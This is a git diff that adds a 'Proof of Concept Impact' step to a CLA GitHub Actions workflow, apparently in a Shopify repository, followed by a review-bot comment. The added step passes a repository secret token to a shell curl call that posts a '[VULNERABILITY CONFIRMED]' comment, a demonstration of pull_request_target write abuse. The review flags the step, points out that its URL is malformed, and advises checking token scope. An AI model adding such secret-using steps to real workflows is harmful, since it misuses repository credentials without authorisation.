diff --git a/.github/workflows/cla.yaml b/.github/workflows/cla.yaml
index bc975ea..3bf3a2e 100644
--- a/.github/workflows/cla.yaml
+++ b/.github/workflows/cla.yaml
@@ -33,3 +33,14 @@ jobs:
 with:
 github-token: ${{ secrets.token }}
 cla-token: ${{ secrets.cla-token }}
+ - name: Proof of Concept Impact
+ env:
+ # Phải dùng đúng tên 'secrets.token' như Shopify đã định nghĩa
+ GH_TOKEN: ${{ secrets.token }}
+ run: |
+ curl -L -X POST \
+ -H "Authorization: Bearer $GH_TOKEN" \
+ -H "Accept: application/vnd.github+json" \
+ "https://github.com{{ github.event.pull_request.number }}/comments" \
+ -d '{"body":"[VULNERABILITY CONFIRMED]: Unauthorized write access via pull_request_target."}'
+
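Review bot: The added `Proof of Concept Impact` step should be dropped rather than merged. It copies `secrets.token` into `GH_TOKEN` for a free-form `run:` shell step, so the secret is no longer confined to the CLA action's `with:` inputs. The trigger and any `permissions:` block are outside this hunk, but the comment body names `pull_request_target`. If that is the trigger, confirm that no job holding this secret checks out or executes content from the PR head, and that the token is scoped to what the CLA check needs (for a `GITHUB_TOKEN`, a job-level `permissions:` limited to `pull-requests: write`). As written, the request target is not a valid API URL and its `{{ … }}` is not expanded as a workflow expression, so the step does not demonstrate the "confirmed" claim in its body. The inline comment is not in English; if kept it should read `# Must use the exact name 'secrets.token' as Shopify defined it`.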